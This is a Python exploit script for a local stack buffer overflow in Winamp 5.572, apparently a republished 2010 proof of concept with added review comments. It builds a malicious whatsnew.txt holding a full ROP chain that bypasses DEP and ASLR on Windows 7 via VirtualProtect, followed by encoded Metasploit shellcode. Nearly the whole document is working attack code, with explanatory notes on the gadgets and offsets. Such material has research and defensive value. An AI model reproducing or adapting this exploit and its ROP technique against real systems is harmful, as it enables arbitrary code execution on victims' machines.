
# Title : Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
# Published : 2010-06-26
# Author : Node


#!/usr/bin/python

#Exploit Title: 	Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
#Date: 			June 26, 2010
#Author:		Node
#Software Link:		http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
#Tested on: 		Windows 7 Ultimate x64 ENG (32-bit Winamp process; every gadget address below and the kernel32 -> VirtualProtect delta are specific to this Winamp build and this OS build)
#Badchars: 		'\x00\xff\x5c\x2f\x0a\x0d\x20'
#Instructions: Replace the original whatsnew.txt in the Winamp install folder with the generated one (this needs write access to that folder - on a default Win7 install under Program Files that means admin rights, so on its own this is code execution as whoever opens the dialog, not a privilege escalation), start Winamp, right-click the flash symbol, "Nullsoft Winamp...", Version history


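"""Generate a malicious whatsnew.txt for Winamp 5.572 (local stack overflow).

Layout of the generated file (see build_payload):

    version prefix | 540 filler bytes | ROP chain | NOP sled | shellcode | filler

How the chain gets past DEP/ASLR on the author's test box:

* Every gadget lives in a Winamp plugin module (in_wm.dll, zlib.dll, gen_ff.dll,
  ml_disc.dll, libsndfile.dll, freetype.wac, ...) at a fixed 0x07xxxxxx /
  0x08xxxxxx address, so the "ASLR bypass" is simply that those modules are not
  randomised.  The addresses are specific to Winamp 5.572 and will not survive
  a different version or plugin set.
* A kernel32 pointer is read from the stack (0x4f0 bytes below the saved stack
  pointer), a fixed delta of 0x201b is added to turn it into VirtualProtect(),
  and the VirtualProtect frame prepared on the stack is then entered with
  XCHG EAX,ESP.  Both the stack offset and the delta are tied to the tested
  Windows 7 build; re-derive them before reusing the chain.

Known inconsistency worth confirming in a debugger: the header lists 0x0a as a
bad char, yet the ADD EAX,ECX gadget 0x070A7265 (used seven times) contains it,
so either 0x0a is not filtered where the chain lands or the list is just the
over-conservative one handed to msfencode.  main() warns about it but still
writes the file, exactly as the original script did.

The original listing had its backslashes stripped ("x8ax35x84x07"); the gadget
addresses are now written as integers and packed with p32(), which also makes
them match the annotated addresses directly.
"""
import struct

# Bytes the encoder was told to avoid (same list as the msfencode -b argument).
BADCHARS = b"\x00\xff\x5c\x2f\x0a\x0d\x20"

OFFSET_TO_RET = 540  # filler before the saved return address is overwritten


def p32(addr):
    """Pack *addr* as a little-endian DWORD, the form a gadget address takes on the x86 stack."""
    return struct.pack("<I", addr)


def find_badchar(payload):
    """Return the lowest offset in *payload* holding a byte from BADCHARS, or -1 if there is none."""
    hits = [payload.find(BADCHARS[i:i + 1]) for i in range(len(BADCHARS))]
    hits = [h for h in hits if h != -1]
    return min(hits) if hits else -1


# Prefix written ahead of the overflow.  Presumably what Winamp parses as the
# version line of whatsnew.txt; it is the only part that may contain a space.
version = b"Winamp 5.572"

rop = b"".join([
    b"A" * OFFSET_TO_RET,
    # ---------------- pivot: save the stack pointer in ESI ----------------
    p32(0x0784358A),        # PUSH ESP # POP ESI # RETN                            [in_wm.dll]
    # NOTE(review): 16 bytes the original skips over here.  With a plain RETN the
    # gadget above would return into 0x41414141, so either it is really RETN 0x10
    # or the stack layout at the crash differs from this listing - confirm in a
    # debugger before reusing the chain.
    b"A" * 16,
    p32(0x07143D8A),        # PUSH ESI # SUB AL,5E # XOR EAX,EAX # POP EBP # RETN   [zlib.dll]
    p32(0x0740B8F7),        # XCHG EAX,EBP # RETN                                   [gen_ff.dll]
    p32(0x07655ED6),        # ADD ESP,30 # RETN  (skips the 48-byte frame below)    [in_cdda.dll]
    # ------- VirtualProtect frame, filled in by the chain before use -------
    b"0000",                # VirtualProtect() address placeholder (start+12)
    b"DDDD",                # return address placeholder
    b"1111",                # lpAddress placeholder
    b"2222",                # dwSize placeholder
    b"3333",                # flNewProtect placeholder
    p32(0x0778F660),        # lpflOldProtect: writable address in in_mp3.dll
    b"A" * 24,
    # ---------------- grab a kernel32 pointer from the stack ----------------
    p32(0x07966C74),        # XCHG EAX,EDX # RETN                                   [ml_local.dll]
    p32(0x0709101A),        # XOR EAX,EAX # RETN                                    [libsndfile.dll]
    p32(0x078DD83A) * 4,    # ADD EAX,41 # RETN             -> 0x104                [ml_disc.dll]
    p32(0x075B4067),        # MOV ECX,EAX # MOV EAX,ECX # RETN                      [gen_ml.dll]
    p32(0x070A7265),        # ADD EAX,ECX # RETN            -> 0x208 (has 0x0a!)    [libsndfile.dll]
    p32(0x075B4067),        # MOV ECX,EAX # MOV EAX,ECX # RETN                      [gen_ml.dll]
    p32(0x070A7265),        # ADD EAX,ECX # RETN            -> 0x410                [libsndfile.dll]
    p32(0x078DD83A) * 3,    # ADD EAX,41 # RETN             -> 0x4d3                [ml_disc.dll]
    p32(0x07091329) * 29,   # INC EAX # RETN                -> 0x4f0                [libsndfile.dll]
    p32(0x07966C74),        # XCHG EAX,EDX # RETN           (EAX = saved ESP)       [ml_local.dll]
    p32(0x076C6AB3),        # SUB EAX,EDX # RETN            (saved ESP - 0x4f0)     [in_flv.dll]
    p32(0x071141A7),        # MOV EAX,DWORD PTR DS:[EAX] # RETN                     [tataki.dll]
    # author's state notes: EAX = kernel32 pointer, ESI = start
    # ------------- turn the kernel32 pointer into VirtualProtect() -------------
    p32(0x07966C74),        # XCHG EAX,EDX # RETN                                   [ml_local.dll]
    p32(0x0709101A),        # XOR EAX,EAX # RETN                                    [libsndfile.dll]
    p32(0x078DD83A) * 4,    # ADD EAX,41 # RETN             -> 0x104                [ml_disc.dll]
    p32(0x075B4067),        # MOV ECX,EAX # MOV EAX,ECX # RETN                      [gen_ml.dll]
    p32(0x070A7265),        # ADD EAX,ECX # RETN            -> 0x208                [libsndfile.dll]
    p32(0x075B4067),
    p32(0x070A7265),        #                               -> 0x410
    p32(0x075B4067),
    p32(0x070A7265),        #                               -> 0x820
    p32(0x075B4067),
    p32(0x070A7265),        #                               -> 0x1040
    p32(0x075B4067),
    p32(0x070A7265),        #                               -> 0x2080
    p32(0x078D1308),        # SUB EAX,41 # RETN             -> 0x203f               [ml_disc.dll]
    p32(0x078DD7C6),        # SUB EAX,20 # RETN             -> 0x201f               [ml_disc.dll]
    p32(0x070911EC) * 4,    # DEC EAX # RETN                -> 0x201b               [libsndfile.dll]
    p32(0x07966C74),        # XCHG EAX,EDX # RETN           (EAX = kernel32 ptr)    [ml_local.dll]
    p32(0x070B7D10),        # ADD EAX,EDX # RETN            (ptr + 0x201b)          [libsndfile.dll]
    # author's state notes: EAX = VirtualProtect(), ESI = start
    # ------------- write VirtualProtect() into the frame -------------
    p32(0x07405582) * 12,   # INC ESI # RETN                                        [gen_ff.dll]
    p32(0x076F5D43),        # MOV DWORD PTR DS:[ESI],EAX # RETN                     [in_midi.dll]
    # author's state notes: EAX = VirtualProtect(), ESI = start+12 (VP slot)
    # ------------- write the return address (= shellcode) -------------
    p32(0x073EB7DD),        # MOV EAX,ESI # RETN                                    [gen_ff.dll]
    p32(0x07966C74),        # XCHG EAX,EDX # RETN                                   [ml_local.dll]
    p32(0x0709101A),        # XOR EAX,EAX # RETN                                    [libsndfile.dll]
    p32(0x08103545),        # ADD EAX,104 # POP EBP # RETN                          [freetype.wac]
    b"AAAA",                # popped into EBP
    p32(0x08103545),
    b"AAAA",
    p32(0x08103545),        #                               -> 3 * 0x104 = 0x30c
    b"AAAA",
    p32(0x070B7D10),        # ADD EAX,EDX # RETN                                    [libsndfile.dll]
    p32(0x07405582) * 4,    # INC ESI # RETN                                        [gen_ff.dll]
    p32(0x076F5D43),        # MOV DWORD PTR DS:[ESI],EAX # RETN                     [in_midi.dll]
    # author's state notes: EAX = start+12+0x30c (shellcode), EDX = start+12 (VP), ESI = start+16
    # ------------- write placeholder 1 (lpAddress = shellcode) -------------
    p32(0x07405582) * 4,    # INC ESI # RETN                                        [gen_ff.dll]
    p32(0x076F5D43),        # MOV DWORD PTR DS:[ESI],EAX # RETN                     [in_midi.dll]
    # author's state notes: ESI = start+20
    # ------------- write placeholder 2 (dwSize = 0x30c) -------------
    p32(0x0834B389),        # XCHG EAX,EBX # RETN                                   [jnetlib.w5s]
    p32(0x0709101A),        # XOR EAX,EAX # RETN                                    [libsndfile.dll]
    p32(0x08103545),        # ADD EAX,104 # POP EBP # RETN                          [freetype.wac]
    b"AAAA",
    p32(0x08103545),
    b"AAAA",
    p32(0x08103545),
    b"AAAA",
    p32(0x07405582) * 4,    # INC ESI # RETN                                        [gen_ff.dll]
    p32(0x076F5D43),        # MOV DWORD PTR DS:[ESI],EAX # RETN                     [in_midi.dll]
    # author's state notes: EAX = 0x30c (size 780), EBX = shellcode, ESI = start+24, EDX = start+12 (VP)
    # ------------- write placeholder 3 (flNewProtect) -------------
    p32(0x0709101A),        # XOR EAX,EAX # RETN                                    [libsndfile.dll]
    p32(0x078DD83A),        # ADD EAX,41 # RETN                                     [ml_disc.dll]
    p32(0x070911EC),        # DEC EAX # RETN                -> 0x40 = PAGE_EXECUTE_READWRITE [libsndfile.dll]
    p32(0x07405582) * 4,    # INC ESI # RETN                                        [gen_ff.dll]
    p32(0x076F5D43),        # MOV DWORD PTR DS:[ESI],EAX # RETN                     [in_midi.dll]
    p32(0x07966C74),        # XCHG EAX,EDX # RETN                                   [ml_local.dll]
    # author's state notes: EAX = start+12 (VP), EBX = shellcode, ESI = start+28
    # ------------- fix EBP so the frame is sane after the call returns -------------
    p32(0x0834B389),        # XCHG EAX,EBX # RETN                                   [jnetlib.w5s]
    p32(0x0709101A),        # XOR EAX,EAX # RETN                                    [libsndfile.dll]
    p32(0x0740B8F7),        # XCHG EAX,EBP # RETN                                   [gen_ff.dll]
    p32(0x0834B389),        # XCHG EAX,EBX # RETN                                   [jnetlib.w5s]
    p32(0x0709E085),        # ADD EBP,EAX # RETN                                    [libsndfile.dll]
    # author's state notes: EAX = start+12 (VP), EBX = ?, EDX = 0x40, ESI = start+28, EBP = start+12
    # ------------- pivot into the frame: RETN pops VirtualProtect() -------------
    p32(0x073CBBC1),        # XCHG EAX,ESP # RETN                                   [gen_ff.dll]
])

nops = b"\x90" * 304  # sled in front of the shellcode; together with it well under dwSize (0x30c)

# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20' -t perl
shellcode = (
    b"\xbb\xd2\xaa\xfa\x33\x31\xc9\xb1\x33\xdb\xd3\xd9\x74\x24"
    b"\xf4\x5e\x83\xc6\x04\x31\x5e\x0b\x03\x5e\xd9\x48\x0f\xcf"
    b"\x35\x05\xf0\x30\xc5\x76\x78\xd5\xf4\xa4\x1e\x9d\xa4\x78"
    b"\x54\xf3\x44\xf2\x38\xe0\xdf\x76\x95\x07\x68\x3c\xc3\x26"
    b"\x69\xf0\xcb\xe5\xa9\x92\xb7\xf7\xfd\x74\x89\x37\xf0\x75"
    b"\xce\x2a\xfa\x24\x87\x21\xa8\xd8\xac\x74\x70\xd8\x62\xf3"
    b"\xc8\xa2\x07\xc4\xbc\x18\x09\x15\x6c\x16\x41\x8d\x07\x70"
    b"\x72\xac\xc4\x62\x4e\xe7\x61\x50\x24\xf6\xa3\xa8\xc5\xc8"
    b"\x8b\x67\xf8\xe4\x06\x79\x3c\xc2\xf8\x0c\x36\x30\x85\x16"
    b"\x8d\x4a\x51\x92\x10\xec\x12\x04\xf1\x0c\xf7\xd3\x72\x02"
    b"\xbc\x90\xdd\x07\x43\x74\x56\x33\xc8\x7b\xb9\xb5\x8a\x5f"
    b"\x1d\x9d\x49\xc1\x04\x7b\x3c\xfe\x57\x23\xe1\x5a\x13\xc6"
    b"\xf6\xdd\x7e\x8d\x09\x6f\x05\xe8\x09\x6f\x06\x5b\x61\x5e"
    b"\x8d\x34\xf6\x5f\x44\x71\x08\x2a\xc5\xd0\x80\xf3\x9f\x60"
    b"\xcd\x03\x4a\xa6\xeb\x87\x7f\x57\x08\x97\xf5\x52\x55\x1f"
    b"\xe5\x2e\xc6\xca\x09\x9c\xe7\xde\x69\x43\x7b\x82\x43\xe6"
    b"\xfb\x21\x9c\xe2"
)

trash = b"B" * 600  # filler after the shellcode


def build_payload():
    """Return the complete contents of the malicious whatsnew.txt as bytes."""
    return version + rop + nops + shellcode + trash


def main():
    """Write whatsnew.txt into the current directory and report what was done.

    A bad char found after the version prefix is reported but does not abort:
    the chain shipped with one (0x0a in 0x070A7265) and was reported working.
    """
    print("[+] Winamp_5.572_whatsnew.txt Win7 ASLR and DEP Bypass - by Node")
    payload = build_payload()
    # The prefix legitimately contains a space, so only the bytes after it are checked.
    off = find_badchar(payload[len(version):])
    if off != -1:
        print("[!] warning: bad char at file offset %d (see module docstring)" % (off + len(version)))
    with open("whatsnew.txt", "wb") as expfile:
        expfile.write(payload)
    print("[+] whatsnew.txt generated.")


if __name__ == "__main__":
    main()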